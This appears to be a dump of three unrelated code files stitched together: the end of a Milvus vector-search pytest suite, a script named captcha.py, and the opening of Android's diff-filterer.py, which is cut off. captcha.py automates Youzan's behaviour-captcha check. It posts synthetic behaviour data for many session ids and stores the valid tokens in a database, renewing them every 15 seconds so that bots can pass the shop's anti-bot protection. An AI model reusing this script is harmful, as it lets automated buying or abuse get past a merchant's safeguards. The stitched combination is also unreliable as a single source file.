@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, dim, index, params, auto_id, _async):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)
# 2. create different index
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim//4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim//4
log.info("test_search_after_index_different_metric_type: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_index_different_metric_type: Created index-%s" % index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index, "IP")
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_multiple_times(self, nb, nq, dim, auto_id, _async):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
# 2. search for multiple times
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i+1))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_sync_async_multiple_times(self, nb, nq, dim, auto_id):
"""
target: test async search after sync search case
method: create connection, collection, insert,
sync search and async search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
# 2. search
log.info("test_search_sync_async_multiple_times: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_sync_async_multiple_times: searching round %d" % (i + 1))
for _async in [False, True]:
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_multiple_vectors(self, nb, nq, dim, auto_id, _async):
"""
target: test search with multiple vectors
method: create connection, collection with multiple
vectors, insert and search
expected: search successfully with limit(topK)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=dim), cf.gen_float_vec_field(name="tmp", dim=dim)]
schema = cf.gen_collection_schema(fields=fields, auto_id=auto_id)
collection_w = self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={"name": c_name, "schema": schema})[0]
# 3. insert
vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
vectors_tmp = [[random.random() for _ in range(dim)] for _ in range(nb)]
data = [[i for i in range(nb)], [np.float32(i) for i in range(nb)], vectors, vectors_tmp]
if auto_id:
data = [[np.float32(i) for i in range(nb)], vectors, vectors_tmp]
res = collection_w.insert(data)
insert_ids = res.primary_keys
assert collection_w.num_entities == nb
# 4. load
collection_w.load()
# 5. search all the vectors
log.info("test_search_multiple_vectors: searching collection %s" % collection_w.name)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
collection_w.search(vectors[:nq], "tmp",
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self, nb, auto_id, _async):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
is_index=True)
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
search_params = {"metric_type": "L2", "params": {"nprobe": 128}}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, limit, default_search_exp,
[par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, nb, nq, dim, auto_id, _async):
"""
target: test search from partitions
method: search from partitions
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim,
is_index=True)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[0].name, par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_names",
[["(.*)"], ["search(.*)"]])
def test_search_index_partitions_fuzzy(self, nb, nq, dim, partition_names, auto_id, _async):
"""
target: test search from partitions
method: search from partitions with fuzzy
partition name
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions_fuzzy: searching through partitions")
limit = 1000
limit_check = limit
par = collection_w.partitions
if partition_names == ["search(.*)"]:
insert_ids = insert_ids[par[0].num_entities:]
if limit > par[1].num_entities:
limit_check = par[1].num_entities
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
partition_names, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self, nq, dim, auto_id, _async):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, auto_id=auto_id,
dim=dim, is_index=True)[0]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s "
"entities through empty partition" % default_limit)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_jaccard_flat_index(self, nq, dim, auto_id, _async):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with JACCARD
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_hamming_flat_index(self, nq, dim, auto_id, _async):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with HAMMING
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "HAMMING"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
collection_w.load()
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6843")
def test_search_binary_tanimoto_flat_index(self, nq, dim, auto_id, _async):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with TANIMOTO
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)
log.info("auto_id= %s, _async= %s" % (auto_id, _async))
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions())
def test_search_with_expression(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True,
nb, dim=dim,
is_index=True)
# filter result with expression in collection
_vectors = _vectors[0]
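# the expression uses Milvus syntax (&&/||); rewrite it so the same predicate
# can be evaluated with Python's eval against the int64/float values bound below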
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
int64 = _vectors.int64[i]
float = _vectors.float[i]
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with expression
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions_field(default_float_field_name))
def test_search_with_expression_auto_id(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=True,
dim=dim,
is_index=True)
# filter result with expression in collection
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
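# bind the float field value into the local scope so eval(expression) below can reference it by name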
exec(f"{default_float_field_name} = _vectors.{default_float_field_name}[i]")
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with different expressions
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self, nb, nq, dim, auto_id, _async):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data and default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_empty(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with empty output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
# 2. search
log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_field(self, auto_id, _async):
"""
target: test search with output fields
method: search with one output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)
# 2. search
log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data and default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*"], ["*", default_float_field_name]])
def test_search_with_output_field_wildcard(self, output_fields, auto_id, _async):
"""
target: test search with output fields using wildcard
method: search with one output_field (wildcard)
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)
# 2. search
log.info("test_search_with_output_field_wildcard: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=output_fields,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data and default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, nb, nq, dim, auto_id, _async):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, and the number of results equals the limit
"""
self._connect()
collection_num = 10
for i in range(collection_num):
# 1. initialize with data
log.info("test_search_multi_collections: search round %d" % (i + 1))
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
# 2. search
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
(default_limit, nq, collection_w.name))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_concurrent_multi_threads(self, nb, nq, dim, auto_id, _async):
"""
target: test concurrent search with multiple threads
method: search from 10 threads concurrently against the same collection
expected: status ok and each search returns the expected results
"""
# 1. initialize with data
threads_num = 10
threads = []
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)
def search(collection_w):
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
# 2. search with multi-processes
log.info("test_search_concurrent_multi_threads: searching with %s processes" % threads_num)
for i in range(threads_num):
t = threading.Thread(target=search, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
|
captcha.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/10/27 10:28 PM
# @Author : Destiny_
# @File : captcha.py
import re
import json
import time
import encrypt
import pymysql
import requests
import schedule
import threading
captcha_map = {}
sid_list = encrypt.sid_list
aim_url = encrypt.aim_url
kdt_id = re.findall(r'kdt_id=(\d+?)&', aim_url)[0]
def header(sid):
headers = {
'content-type': 'application/json',
'Extra-Data': '{"sid":"%s","clientType":"weapp-miniprogram","version":"2.87.8","client":"weapp","bizEnv":"wsc"}' % sid,
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.9(0x18000929) NetType/WIFI Language/zh_CN'
}
return headers
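# Example (hypothetical sid value):
#   requests.get(some_url, headers=header('8f3a...sid'))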
# Captcha generator
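# Flow: GET a behaviour-captcha token and randomStr, encrypt the randomStr via
# encrypt.encrypt(), POST the check request, and on success cache the token in
# captcha_map keyed by sid (an empty string is stored on failure)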
def captcha_creater(sid):
get_url = 'https://uic.youzan.com/passport/api/captcha/get-behavior-captcha-token-v2.json?app_id=wxdcc11cd7703c0e8d&kdt_id=44077958&access_token=&bizType=158&version=1.0'
check_url = 'https://uic.youzan.com/passport/api/captcha/check-behavior-captcha-data.json?app_id=wxdcc11cd7703c0e8d&kdt_id=44077958&access_token='
headers = header(sid)
r = requests.get(url=get_url, headers=headers)
try:
r = r.json()
token = r['data']['token']
rdmstr = r['data']['randomStr']
en_data = encrypt.encrypt(rdmstr)
check_data = {
"captchaType": 2,
"token": token,
"bizType": 158,
"bizData": "{\"platform\":\"weapp\",\"buyer_id\":,\"order_receiver_phone\":\"\",\"book_key\":\"\",\"kdtId\":%s}" % kdt_id,
"userBehaviorData": en_data
}
r = requests.post(url=check_url, headers=headers,
data=json.dumps(check_data))
result = r.json()['data']['success']
if result:
captcha_map[sid] = token
print('Captcha generated successfully')
else:
print('Captcha generation failed')
captcha_map[sid] = ''
except Exception as e:
print(e)
captcha_map[sid] = ''
# Generate captchas for all sids using multiple threads
def make_captchas(sids: list):
threads = []
for sid in sids:
thread = threading.Thread(target=captcha_creater, args=(sid,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# Generate captchas and store them in the database
def cpt():
make_captchas(sid_list)
push_to_mysql()
# Store captchas in the database; adjust the database parameters as needed
def push_to_mysql():
db = pymysql.connect(host='', port=3306, user='', password='', database='')
cursor = db.cursor()
select_sql = 'SELECT sid FROM 验证码table'
cursor.execute(select_sql)
_init_sid = cursor.fetchall()
init_sid = [_[0] for _ in _init_sid]
for sid in init_sid:
if sid not in sid_list:
delete_sql = 'DELETE FROM 验证码table WHERE sid=%s'
cursor.execute(delete_sql, sid)
db.commit()
for sid in captcha_map:
if sid in init_sid:
add_sql = 'UPDATE 验证码table SET captcha=%s WHERE sid=%s'
cursor.execute(add_sql, (captcha_map[sid], sid))
db.commit()
else:
add_sql = 'INSERT INTO 验证码table (No,captcha,sid) VALUES (null,%s,%s)'
cursor.execute(add_sql, (captcha_map[sid], sid))
db.commit()
cursor.close()
db.close()
print('\nCaptcha update complete\n')
# Monitor whether the stored captchas are still valid
def refresh():
db = pymysql.connect(host='', port=3306, user='', password='', database='')
cursor = db.cursor()
emergency_list = []
select_sql = 'SELECT * FROM 验证码table'
cursor.execute(select_sql)
_ = cursor.fetchall()
captchas = [[i[1], i[2]] for i in _]
for _ in captchas:
if _[1] == '0':
emergency_list.append(_)
cursor.close()
db.close()
if emergency_list: # if any captcha is empty, regenerate immediately
print('emergency!')
cpt()
if __name__ == '__main__':
cpt()
schedule.every(1).seconds.do(refresh) # check captcha validity every second
schedule.every(15).seconds.do(cpt) # regenerate captchas every 15 seconds
while True:
schedule.run_pending()
time.sleep(0.01)
|
diff-filterer.py
|
#!/usr/bin/python3
#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime, filecmp, math, multiprocessing, os, shutil, subprocess, stat, sys, time
from collections import OrderedDict
def usage():
print("""Usage: diff-filterer.py [--assume-no-side-effects] [--assume-input-states-are-correct] [--work-path <workpath>] [--num-jobs <count>] [--timeout <seconds>] [--debug] <passingPath> <failingPath> <shellCommand>
diff-filterer.py attempts to transform (a copy of) the contents of <passingPath> into the contents of <failingPath> subject to the constraint that when <shellCommand> is run in that directory, it returns 0
OPTIONS
--assume-no-side-effects
Assume that the given shell command does not make any (relevant) changes to the given directory, and therefore don't wipe and repopulate the directory before each invocation of the command
--assume-input-states-are-correct
Assume that <shellCommand> passes in <passingPath> and fails in <failingPath> rather than re-verifying this
--work-path <filepath>
File path to use as the work directory for testing the shell command
This file path will be overwritten and modified as needed for testing purposes, and will also be the working directory of the shell command when it is run
--num-jobs <count>
The maximum number of concurrent executions of <shellCommand> to spawn at once
Specify 'auto' to have diff-filterer.py dynamically adjust the number of jobs based on system load
--timeout <seconds>
Approximate maximum amount of time to run. If diff-filterer.py expects that running a test would exceed this timeout, then it will skip running the test, terminate early, and report what it did find.
diff-filterer.py doesn't terminate any child processes that have already started, so it is still possible that diff-filterer.py might exceed this timeout by the amount of time required to run one test.
--debug
Enable some debug checks in diff-filterer.py
""")
sys.exit(1)
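# Example invocation (a sketch; the paths and shell command below are hypothetical):
#   ./diff-filterer.py --num-jobs auto --work-path /tmp/diff-filterer /tmp/known-good /tmp/known-bad "./gradlew test"
# This copies /tmp/known-good into the work directory and repeatedly swaps in pieces of
# /tmp/known-bad, keeping each change for which the shell command still exits with 0.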
debug = False
# Miscellaneous file utilities
class FileIo(object):
def __init__(self):
return
def ensureDirExists(self, filePath):
if not os.path.isdir(filePath):
if os.path.isfile(filePath) or os.path.islink(filePath):
os.remove(filePath)
os.makedirs(filePath)
def copyFile(self, fromPath, toPath):
self.ensureDirExists(os.path.dirname(toPath))
self.removePath(toPath)
if os.path.islink(fromPath):
linkText = os.readlink(fromPath)
os.symlink(linkText, toPath)
else:
shutil.copy2(fromPath, toPath)
def hardLink(self, oldPath, newPath):
self.ensureDirExists(os.path.dirname(newPath))
self.removePath(newPath)
os.link(oldPath, newPath)
def writeFile(self, path, text):
f = open(path, "w+")
f.write(text)
f.close()
def writeScript(self, path, text):
self.writeFile(path, text)
os.chmod(path, stat.S_IRWXU)
def removePath(self, filePath):
if len(os.path.split(filePath)) < 2:
raise Exception("Will not remove path at " + filePath + "; is too close to the root of the filesystem")
if os.path.islink(filePath):
os.remove(filePath)
elif os.path.isdir(filePath):
shutil.rmtree(filePath)
elif os.path.isfile(filePath):
os.remove(filePath)
def join(self, path1, path2):
return os.path.normpath(os.path.join(path1, path2))
# tells whether <parent> either contains <child> or is <child>
def contains(self, parent, child):
if parent == child:
return True
return child.startswith(parent + "/")
# returns the common prefix of two paths. For example, commonPrefixOf2("a/b/c", "a/b/cat") returns "a/b"
def commonPrefixOf2(self, path1, path2):
prefix = path2
while True:
if self.contains(prefix, path1):
return prefix
parent = os.path.dirname(prefix)
if parent == prefix:
return None
prefix = parent
# returns the common prefix of multiple paths
def commonPrefix(self, paths):
if len(paths) < 1:
return None
result = None
for path in paths:
if result is None:
# first iteration
result = path
else:
prev = result
result = self.commonPrefixOf2(result, path)
if result is None:
# the common prefix of two paths was nothing
return result
return result
fileIo = FileIo()
# Returns cpu usage
class CpuStats(object):
def cpu_times_percent(self):
# We wait to attempt to import psutil in case we don't need it and it doesn't exist on this system
import psutil
return psutil.cpu_times_percent(interval=None)
cpuStats = CpuStats()
# Fast file copying
class FileCopyCache(object):
def __init__(self):
self.modificationTimes = {}
# Puts a copy of <sourcePath> at <destPath>
# If we already have an unmodified copy, we just hardlink our existing unmodified copy
# If we don't have an unmodified copy, we first make a copy
def copyFile(self, sourcePath, destPath, cachePath):
if cachePath is None:
fileIo.copyFile(sourcePath, destPath)
else:
shareable = self.getShareableFile(sourcePath, cachePath)
fileIo.hardLink(shareable, destPath)
# gets a shareable copy of <sourcePath> in <cachePath> and returns its path
def getShareableFile(self, sourcePath, cachePath):
# note that absolute sourcePath is supported
path = os.path.abspath(cachePath + "/" + sourcePath)
if path in self.modificationTimes:
# we've already shared this file before; let's check whether it has been modified since then
if self.modificationTimes[path] == self.getModificationTime(path):
# this file hasn't been modified since we last shared it; we can just reuse it
return path
# we don't have an existing file that we can reuse, so we have to make one
fileIo.copyFile(sourcePath, path)
self.modificationTimes[path] = self.getModificationTime(path)
return path
# returns the time at which <path> was last modified
def getModificationTime(self, path):
if os.path.exists(path):
